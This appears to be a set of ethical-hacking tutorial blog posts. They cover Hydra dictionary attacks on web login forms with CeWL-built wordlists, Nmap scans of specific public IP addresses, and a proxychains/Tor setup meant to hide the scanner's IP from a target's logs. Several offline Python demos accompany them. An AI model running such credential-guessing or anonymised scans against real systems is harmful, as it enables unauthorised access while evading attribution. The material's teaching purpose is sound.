Ethical Hacking Week 6: Hydra and Dict Attacks

Once enumeration is done, the ethical hacker can move on to trying to obtain the credentials of the administrators. There are many ways to get a password: dictionary attacks, phishing, SQL injection, eavesdropping, malware and plenty more. Today we will focus on a dictionary attack using Hydra.

A dictionary attack is a form of brute-force attack that tries to get through an authentication mechanism by submitting thousands or millions of likely username and password combinations. The candidate passwords are usually drawn from previous data breaches, so they reflect passwords people really chose rather than random strings. The method only works because people pick short, weak or reused passwords; a long random password will not be in any dictionary. Nowadays your browser and your phone provide features to generate safe passwords and store them to make sure

CeWL – is a Ruby app that spiders a given URL to a specified depth, optionally following external links, and returns a list of words that can then be fed to password crackers such as John the Ripper or Hydra. Basically, you can build your own personalized dictionary from a target's own website, which pays off because staff often base passwords on product names, locations or slogans that appear there.

Hydra – is a parallelized network login cracker that ships with Kali Linux, Parrot and other major penetration testing distributions. It speaks many protocols (SSH, FTP, SMB, HTTP forms and more) and tries username and password combinations from the supplied lists against the target service, reporting every pair the service accepts.

Implementation – once you have generated a list of passwords with CeWL or whatever other source you choose, you can start using Hydra. Note that a list of usernames has to be provided as well. Usernames are usually much easier to get than passwords, since they are often visible to outsiders (author names on the site, staff directories) and are frequently the same as the person's email address. These can all be found during the enumeration steps we covered previously.

hydra -L emails.txt -P passwords.txt example.com http-post-form "/login.php:email=^USER^&password=^PASS^:Invalid password"

example.com is the target host you have to give Hydra. The -L flag takes the file of usernames (here a list of email addresses) and the -P flag takes the file of passwords. http-post-form is the Hydra module that submits the credentials to a web form with an HTTP POST. Its argument has three colon-separated fields: the path the form posts to (/login.php), the POST body, in which ^USER^ and ^PASS^ are placeholders that Hydra replaces with the current entry from emails.txt and passwords.txt on every attempt, and finally the failure string. Invalid password is the text the page shows after a failed login; Hydra treats any response that does not contain it as a successful login. Get that string exactly right (check it in the browser's developer tools or with curl first): if it never appears in the response, every attempt looks like a success, and if the application returns a different message, for example a lockout notice after a few failures, that will be reported as a hit too.

If the command is correct, Hydra will perform the dictionary attack, trying every combination from the two lists and printing each pair whose response did not contain the failure string.
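The decision rule behind Hydra's http-post-form module, as an added example that is not part of the original post and not Hydra's own code: the same substitution of ^USER^ and ^PASS^ into the form body and the same "no failure string means success" test, run against a constructed in-process stand-in for /login.php so it executes offline. The mock target, its lockout policy, the credential pair and the two word lists are all constructed for this demonstration; the helper names are this example's own.

```python
from itertools import product

# --- Constructed stand-in for the target's /login.php; not a real server. ---
VALID_CREDS = {"admin@example.com": "Summer2021"}   # constructed credential
LOCKOUT_AFTER = 5                                   # constructed lockout policy


class MockLoginPage:
    """Answers a POST the way a PHP login handler would: with an HTML body."""

    def __init__(self):
        self.failures = {}

    def post(self, form):
        user = form.get("email", "")
        if self.failures.get(user, 0) >= LOCKOUT_AFTER:
            # A lockout page: note that it does NOT contain "Invalid password".
            return "<p>Account locked. Contact the administrator.</p>"
        if VALID_CREDS.get(user) == form.get("password"):
            return "<h1>Welcome back</h1>"
        self.failures[user] = self.failures.get(user, 0) + 1
        return "<p>Invalid password</p>"


def fill_template(template, user, password):
    """Expand 'email=^USER^&password=^PASS^' into form fields, as Hydra does."""
    body = template.replace("^USER^", user).replace("^PASS^", password)
    return dict(field.split("=", 1) for field in body.split("&"))


def dictionary_attack(target, users, passwords, form_template, fail_string):
    """Try every user/password pair; return (hits, number_of_requests).

    Hydra's rule for http-post-form: an attempt succeeded unless the
    response contains fail_string.
    """
    hits, requests = [], 0
    for user, password in product(users, passwords):
        requests += 1
        response = target.post(fill_template(form_template, user, password))
        if fail_string not in response:
            hits.append((user, password))
    return hits, requests


def demo():
    """Run the attack with constructed word lists; mirrors the hydra command above."""
    emails = ["admin@example.com", "bob@example.com"]            # stands in for emails.txt
    passwords = ["password", "123456", "letmein", "Summer2021",  # stands in for passwords.txt
                 "qwerty", "welcome1"]
    return dictionary_attack(MockLoginPage(), emails, passwords,
                             "email=^USER^&password=^PASS^", "Invalid password")


if __name__ == "__main__":
    hits, requests = demo()
    print(f"{requests} requests, reported hits: {hits}")
    # Only the first hit is real: bob's sixth attempt hit the lockout page,
    # whose text lacks the failure string, so it is a false positive.
```

Running it makes 12 requests and reports two hits. The admin pair is genuine; the bob pair is the lockout page being mistaken for a login, which is exactly why the failure string must be verified against every response the application can return, not just the one you saw in the browser.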

Ethical Hacking Week 5: Port Scanning

Port scanning can be done with many tools; today we will look at Nmap (Network Mapper), a free and open-source tool for network discovery and security auditing. It is commonly used to find which hosts on a network are up and which ports on them are open. Along with that host information it reports which services those ports offer, and it can also guess the operating system, so open ports and the security risks they carry become visible. Nmap also offers ping scans and version detection, and it has been evolving for more than two decades.

Nmap works by sending crafted packets using the transport-layer protocols TCP, UDP and SCTP, plus ICMP at the network layer, and inferring the state of each port from the reply, or from the absence of one. Nmap can also do banner grabbing (the -sV option): it connects to an open port and reads what the service announces about itself, which identifies the software and version running there. Not every port answers, though. A closed port replies to a TCP SYN with a RST, while a firewall in front of the host may silently drop the probe so it never reaches its destination; Nmap reports such ports as filtered because it cannot tell whether they are open or closed. Administrators rely on exactly this kind of filtering to protect the services that have to stay exposed.

TCP Message Types – these are the flags you will see when monitoring a TCP connection being set up with the three-way handshake (SYN, SYN-ACK, ACK) and torn down afterwards.

SYN – initiates a connection and synchronizes the initial sequence numbers between the two devices.
ACK – confirms to the other side that its previous segment (for example the SYN) was received.
SYN-ACK – the server's reply to a SYN: its own SYN plus the ACK of the client's SYN, combined in one segment.
FIN – gracefully terminates the connection.
RST – aborts the connection; a closed port answers a SYN with a RST, which is how Nmap tells closed from filtered.

Examples of Port Scanning with Nmap

All of the commands below are run through proxychains (set up in Week 4). Keep in mind that proxychains only relays TCP connections made through the normal socket API, so only a TCP connect scan (-sT, which is Nmap's default when it is not run as root) actually travels through Tor; raw SYN scans, UDP scans and ICMP ping probes leave directly from your own machine.

Ping Scan

$ proxychains nmap -sn 40.90.170.115/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-14 13:34 EDT
Nmap done: 256 IP addresses (33 hosts up) scanned in 7.30 seconds

Port Scan                                                       

$ proxychains nmap 40.90.170.141 -p1-65535
Not shown: 65534 filtered ports
PORT    STATE SERVICE
443/tcp open  https

Services Scan

$ proxychains nmap -sV -vv 40.90.170.141

-sV is the flag that actually performs service and version detection against the open ports; -vv (and -dd) only raise Nmap's verbosity and debugging output and do not change what is scanned.
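A minimal TCP connect scan in Python, added here as an example that is not part of the original post and not Nmap's code: it is the same probe Nmap's -sT scan relies on, and it shows how the three port states above fall out of the handshake. A completed SYN / SYN-ACK / ACK exchange means open, a RST in answer to our SYN surfaces as ConnectionRefusedError and means closed, and silence until the timeout is what Nmap calls filtered. The listener it starts is a constructed local target so the scan runs offline; the host and ports are not the ones from the post, and the function names are this example's own.

```python
import socket
import threading


def scan_port(host, port, timeout=1.0):
    """Return 'open', 'closed' or 'filtered' for host:port, in Nmap's own terms."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))          # kernel performs SYN, SYN-ACK, ACK
        except ConnectionRefusedError:
            return "closed"                  # peer answered our SYN with RST
        except OSError:                      # includes socket.timeout
            return "filtered"                # no SYN-ACK and no RST: probe dropped
        return "open"


def scan_ports(host, ports, timeout=1.0):
    """Connect scan of several ports; one handshake attempt per port."""
    return {port: scan_port(host, port, timeout) for port in ports}


def start_listener(host="127.0.0.1"):
    """Constructed target: listen on an ephemeral port and accept in a thread."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen()
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:                  # listener was closed
                return
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def free_port(host="127.0.0.1"):
    """Pick a port nothing is listening on: bind, read it back, release it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


def demo():
    """Scan one listening port and one idle port on localhost."""
    srv, open_port = start_listener()
    closed_port = free_port()                # cannot collide: open_port is still bound
    try:
        results = scan_ports("127.0.0.1", [open_port, closed_port])
    finally:
        srv.close()
    return {"open": results[open_port], "closed": results[closed_port]}


if __name__ == "__main__":
    for port, state in sorted(demo().items()):
        print(port, state)
```

The filtered state cannot be produced against localhost, since the local stack always answers; you see it when a host's firewall drops the probe, which is what the "65534 filtered ports" line in the output above reports. Because this scan uses connect(), it is also the only kind of scan that proxychains can push through Tor.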

Ethical Hacking Week 4: Anonymity in Port Scanning

This post assumes you are using Kali Linux

Proxy Chains and TOR

One key thing to know before performing port scans is how to stay anonymous and mask your IP address. Most targets sit behind firewalls or intrusion detection systems that log the scan, and those logs record the source IP address of every probe, which points straight back to you. The solution is a proxy: an intermediary machine whose IP address the target sees instead of your own. By connecting to the internet through one or more proxies your connection becomes more private, although your anonymity then rests on the proxy operators not logging or leaking who you are.

Tor is free and open-source software for anonymous communication that directs internet traffic through a worldwide volunteer network of relays in order to conceal a user's location. Without Tor your computer makes a direct TCP connection to the web server you are browsing, and that server sees your IP address. With Tor, your traffic is wrapped in layers of encryption and passed through a circuit of relays (normally three), so your machine never contacts the web server directly. The exit node is the one that finally connects to the web server, so the server sees the exit node's address, and tracing the connection back to your IP address would be very tricky.

Setup and Installation

First, check whether proxychains is already installed by running sudo apt install proxychains. If apt reports that it is already the newest version (0 newly installed), you already have it. Next, change into /etc, where the configuration file proxychains.conf lives. You can also use the locate command to find it, but if proxychains is installed the config file has to be somewhere on your system.

Next, open proxychains.conf with Vim or Nano, whichever you prefer (sudo vim proxychains.conf). In Vim press i to enter insert mode. The top of the file lists three chain modes (dynamic_chain, strict_chain, random_chain); only one may be uncommented, otherwise the last one listed wins. Uncomment dynamic_chain (remove the #) and put a # in front of strict_chain, which is the default. Then scroll down to the [ProxyList] section at the bottom and add Tor's SOCKS port: socks4 127.0.0.1 9050 (already present on a default install) and socks5 127.0.0.1 9050. Either line alone is sufficient, since Tor's SOCKS port speaks both protocols. After that press Escape and type :wq to write the file and quit.

Next, check whether Tor is installed the same way (sudo apt install tor). Once it is installed, start the service with sudo service tor start and confirm it is running with service tor status. The status output opens in a pager, so press q to get back to the prompt; the service keeps running either way, because it is managed by systemd and is not tied to your terminal. Finally run proxychains firefox google.com, look up your IP address (check.torproject.org will also tell you whether you are on Tor), and confirm that your real IP is masked. If it is, you are successfully using proxychains!
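The edits the steps above make to proxychains.conf by hand, as an added example that is not part of the original post: a small Python helper that applies them idempotently, so it can be re-run without duplicating lines. It works on a constructed, abridged copy of the stock Kali file rather than touching /etc/proxychains.conf; the sample text and the function names are this example's own. Two details from the procedure are enforced in code: the chain modes are mutually exclusive, so strict_chain is commented out when dynamic_chain is enabled, and the proxy lines are added under [ProxyList] only if an equivalent line is not already there.

```python
# Constructed, abridged copy of the proxychains.conf that Kali ships (not the real file).
SAMPLE_CONF = """\
# proxychains.conf  VER 3.1
#
# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
#dynamic_chain
#
#random_chain
#
strict_chain
#
# Proxy DNS requests - no leak for DNS data
proxy_dns

[ProxyList]
# add proxy here ...
# defaults set to "tor"
socks4 \t127.0.0.1 9050
"""

CHAIN_MODES = ("dynamic_chain", "strict_chain", "random_chain")
# The two lines the post adds; both point at Tor's SOCKS port.
TOR_PROXIES = ("socks4 127.0.0.1 9050", "socks5 127.0.0.1 9050")


def set_chain_mode(text, mode):
    """Leave exactly one chain-mode option uncommented, commenting out the others."""
    if mode not in CHAIN_MODES:
        raise ValueError(f"unknown chain mode: {mode}")
    out = []
    for line in text.splitlines():
        option = line.lstrip("# \t")          # strip comment marker and indentation
        if option in CHAIN_MODES:
            out.append(option if option == mode else "#" + option)
        else:
            out.append(line)
    return "\n".join(out) + "\n"


def ensure_proxies(text, proxies):
    """Append each proxy line under [ProxyList] unless it is already listed."""
    lines = text.splitlines()
    try:
        start = lines.index("[ProxyList]")
    except ValueError:
        lines.append("[ProxyList]")
        start = len(lines) - 1
    # Normalise whitespace so 'socks4 \t127.0.0.1 9050' matches 'socks4 127.0.0.1 9050'.
    present = {" ".join(l.split()) for l in lines[start + 1:]
               if l.strip() and not l.lstrip().startswith("#")}
    for proxy in proxies:
        key = " ".join(proxy.split())
        if key not in present:
            lines.append(key)
            present.add(key)
    return "\n".join(lines) + "\n"


def configure_for_tor(text):
    """The post's procedure: dynamic_chain on, strict_chain off, Tor proxies listed."""
    return ensure_proxies(set_chain_mode(text, "dynamic_chain"), TOR_PROXIES)


def active_settings(text):
    """Summarise what proxychains would actually read: live chain modes and proxy lines."""
    modes = [l.strip() for l in text.splitlines() if l.strip() in CHAIN_MODES]
    proxies, in_list = [], False
    for l in text.splitlines():
        if l.strip() == "[ProxyList]":
            in_list = True
        elif in_list and l.strip() and not l.lstrip().startswith("#"):
            proxies.append(" ".join(l.split()))
    return {"chain_modes": modes, "proxies": proxies}


if __name__ == "__main__":
    new_conf = configure_for_tor(SAMPLE_CONF)
    print(active_settings(SAMPLE_CONF))   # before: strict_chain, socks4 only
    print(active_settings(new_conf))      # after: dynamic_chain, socks4 and socks5
```

To apply it to the real file you would read /etc/proxychains.conf, pass its contents through configure_for_tor and write the result back as root; active_settings is the check to run afterwards, since a file with two chain modes uncommented will silently behave as the last one listed.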